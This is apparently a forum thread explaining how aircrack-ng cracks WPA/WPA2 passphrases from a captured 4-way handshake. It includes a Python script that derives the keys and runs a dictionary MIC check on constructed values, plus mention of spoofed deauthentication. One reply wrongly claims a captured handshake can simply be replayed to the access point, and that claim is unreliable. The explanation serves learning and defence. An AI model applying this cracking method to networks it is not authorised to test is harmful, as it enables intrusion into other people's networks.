hi guys,
just for educational purposes, I am wondering what the actual idea is behind cracking WPA/WPA2-PSK with aircrack-ng?
OK, I know that we need to capture the 4-way authentication handshake first in order to crack the PSK, and I also know the whole process of how to successfully do that to get the key cracked. But my question here is about the actual aircrack-ng technique regarding the key-cracking process.
In the tutorial "How to crack WPA/WPA2" on the aircrack-ng website, it is written that the 4-way handshake packets are captured and used to break the pre-shared key (PSK). But as far as I know, in the 4-way handshake process the actual PSK is not shared between the client and the access point (AP). The only information shared between the client and the AP is the ANonce, SNonce+MIC, Ack, etc., but not the PSK itself. The PSK is shared between the client and the AP BEFORE the 4-way handshake.
here is the source of my reference for more idea about 4-way handshake and PSK. http://www.airtightnetworks.com/home...er/80211i.html
Thus my question is: how does aircrack-ng process the PSK through the 4-way handshake even though the PSK itself is not included inside the handshake? Or maybe I have got the totally wrong idea about all of this... And again, this is only for educational purposes, to know more about the WPA/WPA2 cracking process.
And my second thought is: although I know how to deauthenticate the victim client to force the authentication process in BT5, how would my wireless station let the victim client know that it is no longer associated with the AP? Is that by injecting a spoofed deauthentication packet, as if the deauth packet were sent from the AP, meaning spoofing the sending address in the deauth packet as the AP and the destination address as the victim client?
Thanks a lot ......
cheers
The key is used for encrypting along with the ESSID and.... The point is, with the other variables known, the crack encrypts with them based off a dictionary, looking for an encrypted handshake match. If it finds one, it found your key.
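The reply above is the whole idea in one sentence; what follows is an added, self-contained Python illustration of it (not code from the aircrack-ng project or from anyone in this thread). Everything the attacker needs is public in the capture: the SSID, both MAC addresses, both nonces and the EAPOL frame whose MIC the client computed. Only the passphrase is missing, and the MIC lets each guess be checked offline. The handshake values below (SSID, MACs, nonces, EAPOL body, passphrase) are constructed for the example, not taken from any real network; the PMK derivation, the PTK expansion and the WPA2 MIC are the 802.11i definitions.

```python
import hashlib
import hmac

# Constructed handshake parameters for the example (no real network involved).
SSID = b"example-lab-net"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # constructed ANonce (sent by the AP in message 1)
SNONCE = bytes(range(32, 64))    # constructed SNonce (sent by the client in message 2)
# Constructed EAPOL-Key message 2 body with its 16-byte MIC field set to zero,
# which is exactly the input over which the MIC is computed.
EAPOL_MSG2_ZEROED_MIC = (
    bytes.fromhex("0103007502010a00000000000000000001") + SNONCE + b"\x00" * 16 + b"\x00" * 24
)


def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is why the SSID matters (the reply's "along with the ESSID"): the same
    passphrase gives a different PMK on a network with a different name, so a
    precomputed table is only reusable for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: expand the PMK with both MACs and both nonces into a 64-byte PTK."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """WPA2 (CCMP) key MIC: HMAC-SHA1 under the KCK, truncated to 16 bytes.
    (WPA1/TKIP uses HMAC-MD5 instead; the structure is otherwise the same.)"""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def mic_for_passphrase(passphrase: bytes) -> bytes:
    """Everything a client does with the passphrase to produce the MIC in message 2."""
    pmk = derive_pmk(passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    kck = ptk[:16]   # first 128 bits of the PTK are the Key Confirmation Key
    return eapol_mic(kck, EAPOL_MSG2_ZEROED_MIC)


# Constructed "captured" MIC: what a client holding this passphrase would have sent.
CAPTURED_MIC = mic_for_passphrase(b"correct horse battery")


def find_passphrase(candidates, captured_mic: bytes):
    """The dictionary check the reply describes: recompute the MIC for each guess and
    compare with the captured one. A match means the guess is the PSK."""
    for candidate in candidates:
        if hmac.compare_digest(mic_for_passphrase(candidate), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    wordlist = [b"password", b"letmein123", b"correct horse battery", b"qwertyuiop"]
    print("recovered:", find_passphrase(wordlist, CAPTURED_MIC))
```

Two things worth noticing from the defender's side. The 4096 PBKDF2 iterations are the only thing making each guess expensive (roughly 8192 HMAC-SHA1 computations), which is why the later reply talks about precomputed tables and GPUs: that cost is paid once per SSID and passphrase, and a common SSID with a dictionary passphrase is exactly the case tables cover. A unique SSID plus a long, non-dictionary passphrase is the mitigation the derivation itself suggests, because the check above never fails on the handshake, only on the guess list.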
You capture the original handshake, then you try to imitate that handshake; once you are done, you go to that AP again and give it that same handshake, and the AP thinks, "Oh... it's you again". Something like that, lol.
I think you don't have to capture it either, just brute-force it on the spot, but the problem is lack of resources (notebook) and tools. This is why you have to capture it, so you go home where pyrit holds terabytes of hashes and CUDA does it 10 times faster.
Reading the documentation on the aircrack-ng website will answer your questions. As this has been widely covered for years there is no more need to redo it here.
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.